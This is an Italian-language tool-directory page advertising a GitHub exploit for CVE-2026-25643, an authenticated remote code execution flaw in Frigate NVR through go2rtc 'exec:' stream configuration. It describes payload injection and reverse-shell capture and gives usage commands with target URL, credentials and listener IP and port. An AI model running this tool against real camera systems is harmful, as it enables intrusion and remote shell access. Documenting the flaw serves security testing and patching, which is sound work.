Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2026-25643-Frigate-RCE — Exploit per la RCE autenticata di Frigate NVR tramite go2rtc exec: iniezione di protocollo, automazione dell'esecuzione di comandi di sistema e cattura di reverse shell. | Kitploit
Strumenti/GitHubGitHub/jduardo2704/cve-2026-25643-frigate-rce
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingApprendimento e FormazioneStrumento di Accesso Remoto
GitHubjduardo2704/cve-2026-25643-frigate-rce

CVE-2026-25643-Frigate-RCE

Exploit per la RCE autenticata di Frigate NVR tramite go2rtc exec: iniezione di protocollo, automazione dell'esecuzione di comandi di sistema e cattura di reverse shell.

Vedi Repository
337 mesi faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2026-25643: Frigate NVR <= 0.16.3 RCE Autenticato

Exploit Title: Frigate NVR <= 0.16.3 - Esecuzione Remota di Codice Autenticata
Data: 2026-02-05
Autore dell'exploit: jduardo2704
Homepage del fornitore: https://frigate.video/
Link del software: https://github.com/blakeblackshear/frigate
Versione: <= 0.16.3
CVE: CVE-2026-25643 Avviso: https://github.com/blakeblackshear/frigate/security/advisories/GHSA-4c97-5jmr-8f6x

Descrizione

Le versioni di Frigate fino alla 0.16.3 sono vulnerabili all'esecuzione remota di codice (RCE) tramite la configurazione go2rtc. Un attaccante con accesso autenticato (o non autenticato se l'istanza è esposta) può iniettare comandi di sistema nella configurazione dello stream utilizzando il protocollo exec:. Questo exploit automatizza l'iniezione del payload, riavvia il servizio e cattura la reverse shell.

Installazione

root@kitploit:~
pip install requests pyyaml

Utilizzo

Modalità autenticata:

root@kitploit:~
python3 frigate_rce.py -u http://target:5000 -U admin -P password -lh YOUR_IP -lp 4444

Modalità non autenticata (se esposta):

root@kitploit:~
python3 frigate_rce.py -u http://target:5000 -lh YOUR_IP -lp 4444

Disclaimer

Questo script è destinato esclusivamente a scopi educativi e a test di sicurezza autorizzati.

Scarica lo strumento